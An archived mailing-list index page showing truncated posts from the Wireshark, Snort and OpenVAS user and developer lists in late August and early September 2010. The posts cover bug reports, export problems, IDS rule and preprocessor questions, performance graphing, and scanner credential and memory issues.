Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38 COHEN, HARVEY S (ATTLABS) (Sep 02)
At Anders' suggestion, I downloaded and installed
wireshark-win32-1.5.0-SVN-34038.exe from
http://www.wireshark.org/download/automated/win32/
T.38 and RTP now appear correctly in the ladder diagram.

Harvey S. Cohen
AT&T Labs, Middletown, NJ
Mobile +1-908-768-5833
Office +1-732-420-4099

-----Original Message-----
From: wireshark-users-bounces () wireshark org
[mailto:wireshark-users-bounces () wireshark org] On Behalf Of...

buildbot failure in Wireshark (development) on Ubuntu-10.04-x64 buildbot-no-reply (Sep 02)
The Buildbot has detected a new failure of Ubuntu-10.04-x64 on Wireshark (development).
Full details are available at:
http://buildbot.wireshark.org/trunk/builders/Ubuntu-10.04-x64/builds/470

Buildbot URL: http://buildbot.wireshark.org/trunk/

Buildslave for this Build: ubuntu-10.04-x64

Build Reason:
Build Source Stamp: 34041
Blamelist: etxrab

BUILD FAILED: failed run-randpkt

sincerely,
-The Buildbot

Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38 Keith French (Sep 02)
I have just raised this on bugzilla as bug 5172

-----Original Message-----
From: wireshark-users-bounces () wireshark org on behalf of Keith French
Sent: Thu 02/09/2010 10:37
To: Community support list for Wireshark
Subject: RE: [Wireshark-users] VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38

I have a similar problem with 1.4.0 and the latest development release 1.5.0 SVN 34041. There are two identical H323
calls in...

Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38 Keith French (Sep 02)
I have a similar problem with 1.4.0 and the latest development release 1.5.0 SVN 34041. There are two identical H323
calls in my trace, the FLOW graphs work fine for both displaying the H225, H245 & RTP. However, on one call Prepare
Filter only shows the H225, but on the other call it shows H225, H245 & RTP.

I'll raise it on bugzilla & attach my trace.

Keith French.

-----Original Message-----
From: wireshark-users-bounces ()...

Re: library wireshark in ruby Stephen Fisher (Sep 01)
This question comes up on a regular basis on this list. usually. There
is no documentation on using libwireshark's dissection API other than
the source code and developer's documentation. That library is not
designed with use outside Wireshark in mind, though it is possible as
long as GPL guidelines (under which it's licensed) are adhered to.

Re: Export to CSV Bill Meier (Sep 01)
Jaap Keuter wrote:

I was mistaken: The problem does occur on Windows.

A similar (but not quite the same) issue exists for exporting psml files.

The "PSML structure" is written at the beginning of the file only for
the first file written. Any following psml exported files will not have
the structure.

(There's a "static gboolean structure_written = FALSE;" in
proto_tree_write_psml() ...).

I'll fix both of these...

Re: Export to CSV Stig Bjørlykke (Sep 01)
I also found some issues exporting as PSML. The second time a PSML
file is saved it's missing the headers.

I'll fix both cases :)

Re: Export to CSV Jaap Keuter (Sep 01)
Send from my iPhone

Because... ? (don't have the code at hand right now)

Thanks,
Jaap

Re: Export to CSV Bill Meier (Sep 01)
Stig Bjørlykke wrote:

The actual issue is that the header fields are output only if
the output includes the first packet (#1) of the capture (however the
packet range is selected and independent of filters, etc).

This bug occurs only on on platforms other than Windows.

Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38 Anders Broman (Sep 01)
Hi,
Could you trye it on a development build from http://www.wireshark.org/download/automated/
it might be related to http://anonsvn.wireshark.org/viewvc/viewvc.cgi?view=rev&revision=33525
Please let us know the result.
Regards
Anders

________________________________
From: wireshark-users-bounces () wireshark org [mailto:wireshark-users-bounces () wireshark org] On Behalf Of COHEN,
HARVEY S (ATTLABS)
Sent: den 31 augusti 2010 22:00
To:...

Re: Wireshark sniffer stop by itself Bill Meier (Sep 01)
Bill Meier wrote:

Addendum:

Re:

>> ...., the sniffer didn't stop working
>> completely but only the capture stop.

Do you mean that the Wireshark GUI was still running and responding ?

If so: then I don't know what happened.

I would still try using Dumpcap by itself to see if the problem still
occurs.

How to decode FP over UDP? wang . hongxia1 (Sep 01)
I am using Wireshark version 1.2.9. I have some FP packets in pcap
format. However I do not see FP protocol option in "decode as" list.
However Enabled protocols， shows FP protocolsenabled which indicates
Wireshark supports fp. I fill "fp" in filters,I can not get no Packets
filtered.Howerver,I see some packets over UDP transported from RNC.

Please tell me how can I decode packets as FP.
Those sample fp packets...

Re: Wireshark sniffer stop by itself Bill Meier (Sep 01)
גוטליב טובים אסף wrote:

Please see: http://wiki.wireshark.org/KnownBugs/OutOfMemory

Wireshark accumulates "state" during a capture and thus will eventually
run out of memory during an extended capture.

It would be better to use Dumpcap If you want to do an extended capture.

Dumpcap just captures the data and writes it to a file.
(Dumpcap is the program used by Wireshark to capture data).

Re: How to decode FP over UDP? Bill Meier (Sep 01)
wang.hongxia1 () zte com cn wrote:

I know nothing about the FP protocol;

However, perhaps the info in the Wireshark Wiki may be of help

http://wiki.wireshark.org/FP
http://wiki.wireshark.org/FP%20Hint

Snort — Everyone's favorite open source IDS, Snort. This archive combines the snort-announce, snort-devel, snort-users, and snort-sigs lists.

Re: Performance Monitor Graphing Tool JJ Cummings (Sep 02)
I'm building an updated one currently... See my blog post from yesterday here: http://global-security.blogspot.com

Comments/desires(for the tool) are all welcome. I'll likely be publishing some initial code shortly!

JJC

Sent from the iRoad

------------------------------------------------------------------------------
This SF.net Dev2Dev email is sponsored by:

Show off your parallel programming skills.
Enter the Intel(R) Threading Challenge...

Re: Performance Monitor Graphing Tool Eoin Miller (Sep 02)
On 9/2/2010 6:46 PM, Greg Lane wrote:

I just end up using GNUPlot + cron. I wrote up a quick blog on it if you
want to see some examles:

http://trojanedbinaries.com/blog/?p=24

-- Eoin
------------------------------------------------------------------------------
This SF.net Dev2Dev email is sponsored by:

Show off your parallel programming skills.
Enter the Intel(R) Threading Challenge 2010.
http://p.sf.net/sfu/intel-thread-sfd...

Performance Monitor Graphing Tool Greg Lane (Sep 02)
Does anybody had a good location to obtain a good perfmonitor graph tool for
snort? Every link that I have tried doesn't seem to work and nothing is
available.

Greg Lane

IT Manager

Lane Enterprises

Email: greglane () laneconstinc com

Phone: (228)872-2414

------------------------------------------------------------------------------
This SF.net Dev2Dev email is sponsored by:

Show off your parallel programming skills.
Enter the Intel(R)...

snort 2.8.6.1/base/ barnyard2 unified2 classification_id Lawrence R. Hughes, Sr. (Sep 02)
Hi,

I have noticed that snort populates the 32 bit field for the classification id in it's unified2 output, but barnyard2
never inserts the classification id into the database?

Below is a snapshot from our mysql.log of all transactions between barnyard2 and mysql:

554 Query BEGIN

554 Query SELECT sig_id FROM signature WHERE sig_name = 'POLICY RDP attempted administrator connection request ' AND
sig_rev = 4 AND sig_sid = 4060 AND sig_gid = 1...

Snort 2.9.0 and Intel QuickAssist Document Retention (Sep 02)
Hello,

What types of hardware devices are the Snort Community using that takes
advantage of the Intel QuickAssist feature added to Snort 2.9.0?

Thanks,

Doc
------------------------------------------------------------------------------
This SF.net Dev2Dev email is sponsored by:

Show off your parallel programming skills.
Enter the Intel(R) Threading Challenge 2010.
http://p.sf.net/sfu/intel-thread-sfd...

Re: Does 'ttl' allow less-than-or-equal and greater-than-or-equal? Russ Combs (Sep 02)
A bug is open on this and the fix (including support for <= and >=) should
be out soon.

The manual was already fixed following your earlier email. Sorry you didn't
get a response then.

There is no public bug tracker (other than this list). But as these bugs
work their way through the system, additional steps are taken to ensure
related things are updated, including SF manuals.

Thanks for pointing out these issues.

Russ...

Rule 3:13476 direction? Jefferson, Shawn (Sep 01)
Hi,

I'm looking at a few alerts from the so_rule 3:13476, but it looks like the direction is wrong...

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"WEB-MISC Microsoft IIS HTMLEncode Unicode string buffer
overflow"; sid:13476; gid:3; rev:2; classtype:web-application-attack; reference:cve,2008-0075;
reference:url,www.microsoft.com/technet/security/bulletin/ms08-006.mspx; metadata: engine shared, soid 3|13476;)

(and...

preprocessor ftp_telnet_protocol: FP on spaces Castle, Shane (Sep 01)
The preprocessor ftp_telnet_protocol always FPs when there is a space in
(e.g.) the CWD command (or any other, for that matter). How do I stop
these alerts? The README.ftptelnet is of no help here. Reading the guide
PDF indicates that I might be able to override this with

cmd_validity CWD < string > (in the case of the CWD FP)

but this is not clear. I suppose I could try it...

Re: how to create testing data files?? Russ Combs (Aug 31)
If you really want to go from text strings straight into Snort, abcip (
http://sourceforge.net/projects/abcip/ ) now includes a DAQ and a raw input
mode, so you can so stuff like this:

Terminal:
snort --daq abc --daq-var raw -i tty

Redirect:
snort --daq abc --daq-var raw -i tty < test.txt

Readback:
snort --daq abc --daq-var raw -r test.txt

Russ
------------------------------------------------------------------------------
This...

Re: A few questions regarding Solaris Mike Lococo (Aug 31)
I add a userparameter to the zabbix_agentd.conf file as follows (ignore
linebreaks, it should all be on one line):

UserParameter=snort.perfmon[*],tail -n1 '/var/log/snort
/$1/snort.stats' | awk -F ',' '{print $ $2}'

This uses tail to grab the last line of a stats file, and pipes that
line into awk in order to print a particular column. $1 and $2 are
zabbix variables that allow you to create "items" that monitor different...

Re: A few questions regarding Solaris Robert Riskin (Aug 31)
Mike thank you very much for the info, i'm curious how you have Zabbix watch
your perfmon file with certain columns. I use Zabbix in a separate
environment (and I love it) but am planning on deploying in production by
year-end.

Yeah i'm going to rebuild the system with a supported SO_RULES platform.

I was thinking about going for a sourcefire box but I really enjoy building
and learning this stuff from the ground up, it's very informative and...

Re: A few questions regarding Solaris Mike Lococo (Aug 31)
I don't have strong feelings about platform. I've always run on RedHat,
which works for me. Lots of folks I respect use FreeBSD. I think
pretty much any platform with pre-compiled SO_RULES is a first-class
citizen with respect to running Snort.

Read the fine manual, there's a section on the perfmon preprocessor. It
writes output to a file of your choosing in comma delimited format. I
use Zabbix to collect and graph the columns I'm...

Re: A few questions regarding Solaris Robert Riskin (Aug 31)
@ Mike
Thanks for your information regarding the SO_RULES about the source
compiled, this means I will have to switch platforms completely. I'm
thinking about CENTOS or Ubuntu, however it looks like Snort is not
compatible with the latest Ubuntu release? (Talking about SO_RULES) and
since they are in the midst of changing supported platforms I will most
likely rebuild my HP system. Does that make the most sense? I'm not going to
do anything with...

Re: sigs Joel Esler (Aug 31)
On Tue, Aug 31, 2010 at 11:22 AM, Yolimita Uribe
<yolimita.uribe () gmail com>wrote:

What type of distributed attacks?

Snort does not do correlation in between sigs at the present time, no.
------------------------------------------------------------------------------
This SF.net Dev2Dev email is sponsored by:

Show off your parallel programming skills.
Enter the Intel(R) Threading Challenge 2010.
http://p.sf.net/sfu/intel-thread-sfd...

sigs Yolimita Uribe (Aug 31)
Hi, i have a question.

how does snort for find distributed attacks? does snort do correlation
between sigs? or snort has sigs for this type of attacks?

thanks
------------------------------------------------------------------------------
This SF.net Dev2Dev email is sponsored by:

Show off your parallel programming skills.
Enter the Intel(R) Threading Challenge 2010.
http://p.sf.net/sfu/intel-thread-sfd...

OpenVAS — Development and announcements regarding OpenVAS, a free network security scanner which forked from Nessus. This is a combination of the English openvas-announce, openvas-devel, openvas-discuss, and openvas-plugins lists.

Re: Memory footprint for openvassd Thomas Reinke (Sep 02)
Ok...have some additional information to add now -
it would seem that a raw start up of Nessus was consuming
approximately 20M. The same start-up on OpenVAS
consumes >100M. It also seems that the child processes
are constrained by the maximum size of that startup,
i.e. we never see the memory of an actual script
processing task exceed that memory usage.

The factor of 5 (approximately 4K memory consumption
per script in the test suite)...

Memory footprint for openvassd Thomas Reinke (Sep 02)
Hi all,

We're using openvas scanning daemon 3.1 only (have our own
customized client for controlling scans), and we've noticed
that with the change from nessus to openvas, the memory footprint
has ballooned in a huge way.

Currently, the typical amount of memory being consumed by
processes is averaging around 40 Meg per process, but many
tasks running over 100Meg.

We've already throttled our scan utiliziation to one third
of what it used to be,...

Re: Manager can't update/rebuild DB: database table is locked Matthew Mundell (Aug 27)
Perhaps there is an old Manager running that has the lock on the database?

Manager can't update/rebuild DB: database table is locked LC W (Aug 27)
Hello all. I've built and installed openvas-libraries-3.1.2,
openvas-scanner-3.1.0, and openvas-manager-1.0.2 from source on
RHEL5.5. I created the "om" account/certs per the README, and started
openvassd on port 9391, then tried to do a rebuild of the manager
database by running "openvasmd --sport 9391 --rebuild --verbose". If
I watch the manager log, I see that it connects to the scanner, and
then a bunch of SQL...

Re: Can't use SMB credentials Jean Mouric (Aug 27)
I'm not sure about that. I found out that my plugin folder had been
corrupted and smb authentification worked just fine when I restored it. As
for the password not showing in the logs, it may be intentional, since it
doesn't show when you do a get_config either.

2010/8/27 Lucyga Dierk <Dierk.Lucyga () cancom de>

Re: Can't use SMB credentials Lucyga Dierk (Aug 27)
Hi,

This might be related to the (yet unsolved) problem I described in my mail on August 13.
Seems like SMB passwords are generally ignored.

Dierk Lucyga

Re: Can't use SMB credentials Jean Mouric (Aug 26)
Well, my bad, I got it to work after all. It seems that my plugin folder was
corrupted : everything seems to be ok now. Thanks for the answers !

2010/8/26 Jean Mouric <j.mouric () gmail com>

Re: Can't use SMB credentials Jean Mouric (Aug 26)
I'll consider it.

How could I miss this? I changed it, but it still doesn't work though.

As I said, the lsc_credential method doesn't work either for SMB, which is
also why I think the type error above isn't the source of the problem. Is
there any difference in the handling of SMB parameters by the manager
compared to SSH? Maybe I shouldn't specify this in clear text but a specific
format?

Re: Can't use SMB credentials Matthew Mundell (Aug 26)
Doing a | xmlstarlet will probably be easier.

You could leave out the <name>, because the Manager will use the name in
the get_configs_response.

[...]

This should be of type password.

Note also that if the target has a credential associated with it, then the
Manager will also send those credentials. This could override the values
you sent here.

Re: Can't use SMB credentials Jean Mouric (Aug 26)
Oh, I just realized trimmed the slashes in my commands in my e-mail, they
actually look like :

omp -p 9391 -X "<create_target><name>my target</name><hosts>[my targets
here]</hosts></create_target>"

omp -p 9391 -X "<create_config><name>[my config name]</name><get_configs_

2010/8/26 Jean Mouric <j.mouric () gmail com>

Re: Can't use SMB credentials Jean Mouric (Aug 26)
Oops, I meant omp as in openvas-cli, sorry about that, I did use the right
thing.

As for the exact OMP commands I use, I start the scanner and the manager as
usual and then :
(note : I do a | sed to get the ids generated by each command)

omp -p 9391 -X "<create_target><name>my target</name><hosts>[my targets
here]</hosts></create_target>"

omp -p 9391 -X "<create_config><name>[my...

Re: Can't use SMB credentials Jan-Oliver Wagner (Aug 25)
just a side note: please as your time permits use the "omp" command line tool of the
package "openvas-cli". That represents the most current state.
"omp-cli" has been moved out of the newest OpenVAS-Client.

Best

Jan

Re: Can't use SMB credentials Matthew Mundell (Aug 25)
It'd probably help if you listed an example of the exact OMP commands you
are using so we can look for the problem.

Also, if you run gsad with -v it will write a log including all the OMP to
PREFIX/var/log/openvas/gsad.log. This could help you figure out what the
GSA is doing right.

Can't use SMB credentials Jean Mouric (Aug 25)
Hi everyone !

I'm having somewhat of a weird problem. Here goes : I'm trying to automate
OpenVAS by having scripts run omp-cli. For the config, I have a template
file that I modify and feed to omp-cli.

I tried putting ssh and smb credentials (all in clear text) in it and ssh
works but smb doesn't. I tried to use <create_lsc_credential> to integrate
in the target instead of changing the config, and the same thing happened :
ssh worked and...

Re: Cannot attach to remote openvassd instances, but local scans possible Brandon Perry (Aug 25)
I was actually misunderstanding what '-a' did and now have it working.
I apologize for the noise.

More Lists

Related Resources

We're always looking for great network security related lists to archive. To suggest one, mail Fyodor.